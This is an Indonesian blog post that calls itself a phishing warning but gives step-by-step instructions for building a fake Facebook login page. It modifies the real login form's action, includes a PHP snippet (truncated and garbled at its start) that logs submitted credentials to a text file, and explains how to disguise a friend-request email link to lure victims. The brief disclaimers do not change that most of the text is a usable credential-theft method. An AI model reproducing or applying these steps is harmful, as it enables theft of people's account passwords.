Fake Login Facebook, Hati - hati dengan Phising login di Facebook

Postingan ini  tidak untuk mengajarkan melakukan phising, tapi cuma memberi sedikit pengetahuan agar semua lebih berhati- hati dalam melakukan login baik di facebook,di Friendster, transaksi online dan lainnya, caranya :

1. Buka http://www.facebook.com/login.php, lalu view source , atau juga bisa tekan ctrl+u . copy dan paste ke notepad. Cari “action=” (tanpa quote) dan kita akan memulai editingnya.
pada lingkaran merah action=”https://login.facebook.com/login.php” rubahlah menjadi  action=”next.php” pada lingkaran biru, rubah methode dari “POST” menjadi “get” simpan notepad ini menjadi index.php (jangan html)

2. buka notepad baru isikan kode berikut :

$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
simpan sebagai next.php

3. buka notepad lagi biarkan kosong, lalu simpan dng nama pass.txt

Upload 3 file tersebut “index.php, next.php, pass.txt” kedalam hosting. saya rasa semua mempunyai hosting kesukaan masing2,.
OK,Sekarang Kamu sudah punya phising page facebook .

4. Langkah-langkah spoofing.

copy content asli undangan pertemanan dari facebook.
edit hyperlink dari : http:/www.facebook.com/n/?reqs.php ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu.
phising siap dikirim ke korban kamu.
Dari modus di atas tadi semua bisa kita antisipasi jika kita teliti dahulu sebelum masuk(login) ke situs” yg membutuhkan password & email (inilah contoh fake login palsu)

Ingat ini cuma sebagai contoh, jangan masukkan email atau password teman2 mu ya,.jadikan pelajaran aja dan agar lebih hati2

2 comments:

Powered by Blogger.